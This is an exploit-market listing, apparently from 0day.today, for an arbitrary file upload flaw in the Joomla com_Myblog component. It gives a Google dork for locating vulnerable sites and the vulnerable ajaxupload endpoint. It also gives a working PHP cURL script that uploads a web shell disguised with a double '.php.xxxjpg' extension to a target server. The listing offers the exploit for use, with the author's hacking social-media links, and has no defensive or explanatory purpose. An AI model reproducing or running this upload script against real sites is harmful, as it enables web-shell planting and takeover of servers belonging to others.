[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla com_Myblog Arbitrary File Upload Vulnerability

Author
Back-DOOR
Risk
[
Security Risk High
]
0day-ID
0day-ID-23901
Category
web applications
Date add
20-07-2015
Platform
php
[+]   Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability 


----------------------------------------------------

[+]   Author  : Back-DOOR

----------------------------------------------------
[+]   Exploit by   :   Back-DOOR

[+]   Dork google   :  inurl:/components/com_myblog/
----------------------------------------------------

[+]   Contact  :  https://facebook.com/Backdoor.ma
[+]   Like  :  https://fb.com/BaCkDoOr.HaCkInG
[+]   youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos


exploit Vul : /index.php?option=com_myblog&task=ajaxupload


Vuln code : {error: 'No file has been uploaded.', msg: '' }


Exploiter :D :
***************************************************************************************************
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
***************************************************************************************************


#  0day.today [2024-11-16]  #